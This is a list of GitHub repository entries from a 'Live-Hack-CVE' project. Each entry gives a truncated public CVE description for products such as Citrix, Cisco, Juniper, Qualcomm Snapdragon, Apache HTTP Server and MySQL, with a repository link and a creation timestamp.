**Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SA CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8300](https://github.com/Live-Hack-CVE/CVE-2020-8300) create time: 2022-12-29T16:43:37Z

**A crafted input file could cause a null pointer dereference in jcopy_sample_rows() when processed by libjpeg-turbo. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35538](https://github.com/Live-Hack-CVE/CVE-2020-35538) create time: 2022-12-29T16:43:33Z

**A NULL pointer dereference issue was found in the ACPI code of QEMU. A malicious, privileged user within the guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4158](https://github.com/Live-Hack-CVE/CVE-2021-4158) create time: 2022-12-29T16:54:10Z

**The Mobile Events Manager WordPress plugin before 1.4.4 does not sanitise and escape various of its settings, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25049](https://github.com/Live-Hack-CVE/CVE-2021-25049) create time: 2022-12-29T16:49:25Z

**Implementation of the WLAN module interfaces has the information disclosure vulnerability. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46836](https://github.com/Live-Hack-CVE/CVE-2021-46836) create time: 2022-12-29T16:46:02Z

**Implementation of the WLAN module interfaces has the information disclosure vulnerability. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40024](https://github.com/Live-Hack-CVE/CVE-2021-40024) create time: 2022-12-29T16:45:58Z

**A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an authenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to improper inclusion of sensitive infor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1406](https://github.com/Live-Hack-CVE/CVE-2021-1406) create time: 2022-12-29T16:45:44Z

**A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker coul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1349](https://github.com/Live-Hack-CVE/CVE-2021-1349) create time: 2022-12-29T16:45:39Z

**A vulnerability in the IPv6 traffic processing of Cisco IOS XR Software and Cisco NX-OS Software for certain Cisco devices could allow an unauthenticated, remote attacker to bypass an IPv6 access control list (ACL) that is configured for an interface of an affected device. The vulnerability is due to improper processin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1389](https://github.com/Live-Hack-CVE/CVE-2021-1389) create time: 2022-12-29T16:45:36Z

**A vulnerability in the DECnet Phase IV and DECnet/OSI protocol processing of Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation of DECnet traffic that is received by an affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1352](https://github.com/Live-Hack-CVE/CVE-2021-1352) create time: 2022-12-29T16:45:32Z

**Multiple vulnerabilities in the CLI of Cisco IOS XE SD-WAN Software could allow an authenticated, local attacker to access the underlying operating system with root privileges. These vulnerabilities are due to insufficient input validation of certain CLI commands. An attacker could exploit these vulnerabilities by auth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1383](https://github.com/Live-Hack-CVE/CVE-2021-1383) create time: 2022-12-29T16:45:29Z

**Configuration defects in the secure OS module. Successful exploitation of this vulnerability will affect confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40023](https://github.com/Live-Hack-CVE/CVE-2021-40023) create time: 2022-12-29T16:45:25Z

**Multiple vulnerabilities in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and modify the configuration of an affected system, gain access to sensitive information, and view information that they are not authorized to access. For CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1305](https://github.com/Live-Hack-CVE/CVE-2021-1305) create time: 2022-12-29T16:45:22Z

**A vulnerability in the Local Packet Transport Services (LPTS) programming of the SNMP with the management plane protection feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to allow connections despite the management plane protection that is configured to deny access to the SNMP server of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1243](https://github.com/Live-Hack-CVE/CVE-2021-1243) create time: 2022-12-29T16:45:17Z

**A vulnerability in the user interface of Cisco Webex Meetings and Cisco Webex Meetings Server Software could allow an authenticated, remote attacker to inject a hyperlink into a meeting invitation email. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by entering CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1221](https://github.com/Live-Hack-CVE/CVE-2021-1221) create time: 2022-12-29T16:45:14Z

**A vulnerability in the fabric infrastructure VLAN connection establishment of Cisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) Mode could allow an unauthenticated, adjacent attacker to bypass security validations and connect an unauthorized server to the infrastructure VLAN. This vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1228](https://github.com/Live-Hack-CVE/CVE-2021-1228) create time: 2022-12-29T16:45:10Z

**A vulnerability in the Link Layer Discovery Protocol (LLDP) for Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode could allow an unauthenticated, adjacent attacker to disable switching on a small form-factor pluggable (SFP) interface. This vulnerability is due to incomplete validation o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1231](https://github.com/Live-Hack-CVE/CVE-2021-1231) create time: 2022-12-29T16:45:04Z

**Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1140](https://github.com/Live-Hack-CVE/CVE-2021-1140) create time: 2022-12-29T16:45:00Z

**Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1139](https://github.com/Live-Hack-CVE/CVE-2021-1139) create time: 2022-12-29T16:44:33Z

**Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1141](https://github.com/Live-Hack-CVE/CVE-2021-1141) create time: 2022-12-29T16:44:29Z

**Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system. For more information about these vulnerabilities, see the Details section of this advisory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1138](https://github.com/Live-Hack-CVE/CVE-2021-1138) create time: 2022-12-29T16:44:26Z

**The use of multiple hard-coded cryptographic keys in cSRX Series software in Juniper Networks Junos OS allows an attacker to take control of any instance of a cSRX deployment through device management services. This issue affects: Juniper Networks Junos OS on cSRX Series: All versions prior to 20.2R3; 20.3 versions pri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0266](https://github.com/Live-Hack-CVE/CVE-2021-0266) create time: 2022-12-29T16:44:22Z

**An improper authorization vulnerability in the Simple Network Management Protocol daemon (snmpd) service of Juniper Networks Junos OS leads an unauthenticated attacker being able to perform SNMP read actions, an Exposure of System Data to an Unauthorized Control Sphere, or write actions to OIDs that support write opera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0260](https://github.com/Live-Hack-CVE/CVE-2021-0260) create time: 2022-12-29T16:44:19Z

**A vulnerability in Juniper Networks Junos OS ACX500 Series, ACX4000 Series, may allow an attacker to cause a Denial of Service (DoS) by sending a high rate of specific packets to the device, resulting in a Forwarding Engine Board (FFEB) crash. Continued receipt of these packets will sustain the Denial of Service (DoS) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0233](https://github.com/Live-Hack-CVE/CVE-2021-0233) create time: 2022-12-29T16:44:15Z

**NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (vGPU plugin), where there is the potential to execute privileged operations by the guest OS, which may lead to information disclosure, data tampering, escalation of privileges, and denial of service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1118](https://github.com/Live-Hack-CVE/CVE-2021-1118) create time: 2022-12-29T16:44:12Z

**An authentication bypass vulnerability in the Juniper Networks Paragon Active Assurance Control Center may allow an attacker with specific information about the deployment to mimic an already registered Test Agent and access its configuration including associated inventory details. If the issue occurs, the affected Tes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0232](https://github.com/Live-Hack-CVE/CVE-2021-0232) create time: 2022-12-29T16:44:08Z

**A local privilege escalation vulnerability in telnetd.real of Juniper Networks Junos OS may allow a locally authenticated shell user to escalate privileges and execute arbitrary commands as root. telnetd.real is shipped with setuid permissions enabled and is owned by the root user, allowing local users to run telnetd.r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0223](https://github.com/Live-Hack-CVE/CVE-2021-0223) create time: 2022-12-29T16:44:05Z

**A sensitive information disclosure vulnerability in delta-export configuration utility (dexp) of Juniper Networks Junos OS may allow a locally authenticated shell user the ability to create and read database files generated by the dexp utility, including password hashes of local users. Since dexp is shipped with setuid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0204](https://github.com/Live-Hack-CVE/CVE-2021-0204) create time: 2022-12-29T16:44:01Z

**This vulnerability exists in Milesight Video Management Systems (VMS), all firmware versions prior to 40.7.0.79-r1, due to improper input handling at camera’s web-based management interface. A remote attacker could exploit this vulnerability by sending a specially crafted http request on the targeted network camera. Su CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3001](https://github.com/Live-Hack-CVE/CVE-2022-3001) create time: 2022-12-29T16:54:38Z

**Information disclosure in WLAN due to improper validation of array index while parsing crafted ANQP action frames in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25690](https://github.com/Live-Hack-CVE/CVE-2022-25690) create time: 2022-12-29T16:54:35Z

**Denial of service in WLAN HOST due to buffer over read while unpacking frames in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25670](https://github.com/Live-Hack-CVE/CVE-2022-25670) create time: 2022-12-29T16:54:31Z

**Denial of service in video due to buffer over read while parsing MP4 clip in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25669](https://github.com/Live-Hack-CVE/CVE-2022-25669) create time: 2022-12-29T16:54:28Z

**Nextcloud server is an open source personal cloud product. Affected versions of this package are vulnerable to Information Exposure which fails to strip the Authorization header on HTTP downgrade. This can lead to account access exposure and compromise. It is recommended that the Nextcloud Server is upgraded to 23.0.7 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36074](https://github.com/Live-Hack-CVE/CVE-2022-36074) create time: 2022-12-29T16:54:24Z

**Nextcloud files access control is a nextcloud app to manage access control for files. Users with limited access can see file names in certain cases where they do not have privilege to do so. This issue has been addressed and it is recommended that the Nextcloud Files Access Control app is upgraded to 1.12.2, 1.13.1 or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36075](https://github.com/Live-Hack-CVE/CVE-2022-36075) create time: 2022-12-29T16:54:20Z

**Information disclosure in video due to buffer over-read while processing avi file in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25653](https://github.com/Live-Hack-CVE/CVE-2022-25653) create time: 2022-12-29T16:54:17Z

**Bolt CMS contains a vulnerability in version 5.1.12 and below that allows an authenticated user with the ROLE_EDITOR privileges to upload and rename a malicious file to achieve remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36532](https://github.com/Live-Hack-CVE/CVE-2022-36532) create time: 2022-12-29T16:54:13Z

**go-cvss is a Go module to manipulate Common Vulnerability Scoring System (CVSS). In affected versions when a full CVSS v2.0 vector string is parsed using `ParseVector`, an Out-of-Bounds Read is possible due to a lack of tests. The Go module will then panic. The problem is patched in tag `v0.4.0`, by the commit `d9d478f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39213](https://github.com/Live-Hack-CVE/CVE-2022-39213) create time: 2022-12-29T16:53:04Z

**A flaw was found in Keystone. There is a time lag (up to one hour in a default configuration) between when security policy says a token should be revoked from when it is actually revoked. This could allow a remote administrator to secretly maintain access for longer than expected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2447](https://github.com/Live-Hack-CVE/CVE-2022-2447) create time: 2022-12-29T16:53:01Z

**A remote, unauthenticated attacker can enumerate valid users by sending specific requests to the webservice of MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22520](https://github.com/Live-Hack-CVE/CVE-2022-22520) create time: 2022-12-29T16:52:57Z

**Apache James prior to release 3.6.3 and 3.7.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. Fix of CVE-2021-38542, which solved similar problem fron Apache James 3.6.1, is subject to a parser differential and do not take into account concurrent requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28220](https://github.com/Live-Hack-CVE/CVE-2022-28220) create time: 2022-12-29T16:52:53Z

**The Classified Listing Pro WordPress plugin before 2.0.20 does not escape a generated URL before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2655](https://github.com/Live-Hack-CVE/CVE-2022-2655) create time: 2022-12-29T16:52:50Z

**There is a remote code execution (RCE) vulnerability in Tenhot TWS-100 V4.0-201809201424 router device. It is necessary to know that the device account password is allowed to escape the execution system command through the network tools in the network diagnostic component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37861](https://github.com/Live-Hack-CVE/CVE-2022-37861) create time: 2022-12-29T16:52:46Z

**TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38535](https://github.com/Live-Hack-CVE/CVE-2022-38535) create time: 2022-12-29T16:52:43Z

**Under certain conditions an attacker authenticated as a CMS administrator access the BOE Commentary database and retrieve (non-personal) system data, modify system data but can't make the system unavailable. This needs the attacker to have high privilege access to the same physical/logical network to access information CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32244](https://github.com/Live-Hack-CVE/CVE-2022-32244) create time: 2022-12-29T16:52:39Z

**TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setdiagnosicfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38534](https://github.com/Live-Hack-CVE/CVE-2022-38534) create time: 2022-12-29T16:52:36Z

**Memory corruption occurs while processing command received from HLOS due to improper length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22066](https://github.com/Live-Hack-CVE/CVE-2022-22066) create time: 2022-12-29T16:52:32Z

**Memory Corruption during wma file playback due to integer overflow in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22074](https://github.com/Live-Hack-CVE/CVE-2022-22074) create time: 2022-12-29T16:52:29Z

**Memory corruption in audio module due to integer overflow in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22081](https://github.com/Live-Hack-CVE/CVE-2022-22081) create time: 2022-12-29T16:52:25Z

**Memory corruption in audio while playing record due to improper list handling in two threads in Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22089](https://github.com/Live-Hack-CVE/CVE-2022-22089) create time: 2022-12-29T16:52:22Z

**Improper authorization of a replayed LTE security mode command can lead to a denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22091](https://github.com/Live-Hack-CVE/CVE-2022-22091) create time: 2022-12-29T16:52:18Z

**Memory corruption in kernel due to use after free issue in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22092](https://github.com/Live-Hack-CVE/CVE-2022-22092) create time: 2022-12-29T16:52:14Z

**Memory corruption or temporary denial of service due to improper handling of concurrent hypervisor operations to attach or detach IRQs from virtual interrupt sources in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22093](https://github.com/Live-Hack-CVE/CVE-2022-22093) create time: 2022-12-29T16:52:10Z

**memory corruption in Kernel due to race condition while getting mapping reference in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22094](https://github.com/Live-Hack-CVE/CVE-2022-22094) create time: 2022-12-29T16:52:07Z

**Memory corruption in synx driver due to use-after-free condition in the synx driver due to accessing object handles without acquiring lock in Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22095](https://github.com/Live-Hack-CVE/CVE-2022-22095) create time: 2022-12-29T16:52:03Z

**Memory corruption in bluetooth due to integer overflow while processing HFP-UNIT profile in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Mobile, Snapdragon Voice & Music CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22105](https://github.com/Live-Hack-CVE/CVE-2022-22105) create time: 2022-12-29T16:52:00Z

**Cryptographic issues in BSP due to improper hash verification in Snapdragon Wired Infrastructure and Networking CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25652](https://github.com/Live-Hack-CVE/CVE-2022-25652) create time: 2022-12-29T16:51:56Z

**Memory corruption in kernel due to improper input validation while processing ION commands in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25654](https://github.com/Live-Hack-CVE/CVE-2022-25654) create time: 2022-12-29T16:51:34Z

**Possible integer overflow and memory corruption due to improper validation of buffer size sent to write to console when computing the payload size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25656](https://github.com/Live-Hack-CVE/CVE-2022-25656) create time: 2022-12-29T16:51:30Z

**Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2005-2970](https://github.com/Live-Hack-CVE/CVE-2005-2970) create time: 2022-12-29T15:21:41Z

**ssl_engine_kernel.c in mod_ssl before 2.8.24, when using "SSLVerifyClient optional" in the global virtual host configuration, does not properly enforce "SSLVerifyClient require" in a per-location context, which allows remote attackers to bypass intended access restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2005-2700](https://github.com/Live-Hack-CVE/CVE-2005-2700) create time: 2022-12-29T15:21:37Z

**The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2005-2088](https://github.com/Live-Hack-CVE/CVE-2005-2088) create time: 2022-12-29T15:21:33Z

**Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-5752](https://github.com/Live-Hack-CVE/CVE-2006-5752) create time: 2022-12-29T15:21:58Z

**http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-3918](https://github.com/Live-Hack-CVE/CVE-2006-3918) create time: 2022-12-29T15:21:55Z

**The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-3847](https://github.com/Live-Hack-CVE/CVE-2007-3847) create time: 2022-12-29T15:22:35Z

**Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-3304](https://github.com/Live-Hack-CVE/CVE-2007-3304) create time: 2022-12-29T15:22:02Z

**CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-0456](https://github.com/Live-Hack-CVE/CVE-2008-0456) create time: 2022-12-29T15:22:45Z

**Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a n CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-0455](https://github.com/Live-Hack-CVE/CVE-2008-0455) create time: 2022-12-29T15:22:42Z

**mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-0005](https://github.com/Live-Hack-CVE/CVE-2008-0005) create time: 2022-12-29T15:22:38Z

**Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1506](https://github.com/Live-Hack-CVE/CVE-2013-1506) create time: 2022-12-29T15:20:04Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier and 5.6.19 and earlier allows remote authenticated users to affect availability via vectors related to SERVER:REPLICATION ROW FORMAT BINARY LOG DML. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6463](https://github.com/Live-Hack-CVE/CVE-2014-6463) create time: 2022-12-29T16:05:28Z

**Unspecified vulnerability in Oracle MySQL Server 5.6.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4895](https://github.com/Live-Hack-CVE/CVE-2015-4895) create time: 2022-12-29T16:05:42Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier and 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Optimizer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4757](https://github.com/Live-Hack-CVE/CVE-2015-4757) create time: 2022-12-29T16:05:38Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4807](https://github.com/Live-Hack-CVE/CVE-2015-4807) create time: 2022-12-29T16:05:35Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DML, a different vulnerability than CVE-2015-4858. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4913](https://github.com/Live-Hack-CVE/CVE-2015-4913) create time: 2022-12-29T16:05:31Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.43 and earlier and 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4864](https://github.com/Live-Hack-CVE/CVE-2015-4864) create time: 2022-12-29T16:05:24Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4861](https://github.com/Live-Hack-CVE/CVE-2015-4861) create time: 2022-12-29T16:05:20Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.42 and earlier, and 5.6.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Federated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0499](https://github.com/Live-Hack-CVE/CVE-2015-0499) create time: 2022-12-29T16:04:59Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.40 and earlier and 5.6.21 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Security : Privileges : Foreign Key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0374](https://github.com/Live-Hack-CVE/CVE-2015-0374) create time: 2022-12-29T16:04:55Z

**A logical error in ownCloud Server before 10.0.2 caused disclosure of valid share tokens for public calendars. Thus granting an attacker potentially access to publicly shared calendars without knowing the share token. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9339](https://github.com/Live-Hack-CVE/CVE-2017-9339) create time: 2022-12-29T15:23:58Z

**An attacker is logged in as a normal user and can somehow make admin to delete shared folders in ownCloud Server before 10.0.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9340](https://github.com/Live-Hack-CVE/CVE-2017-9340) create time: 2022-12-29T15:23:54Z

**Inadequate escaping lead to XSS vulnerability in the search module in ownCloud Server before 8.2.12, 9.0.x before 9.0.10, 9.1.x before 9.1.6, and 10.0.x before 10.0.2. To be exploitable a user has to write or paste malicious content into the search dialogue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-9338](https://github.com/Live-Hack-CVE/CVE-2017-9338) create time: 2022-12-29T15:23:46Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier, 5.6.36 and earlier and 5.7.18 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3653](https://github.com/Live-Hack-CVE/CVE-2017-3653) create time: 2022-12-29T15:20:14Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to comp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2767](https://github.com/Live-Hack-CVE/CVE-2018-2767) create time: 2022-12-29T15:20:37Z

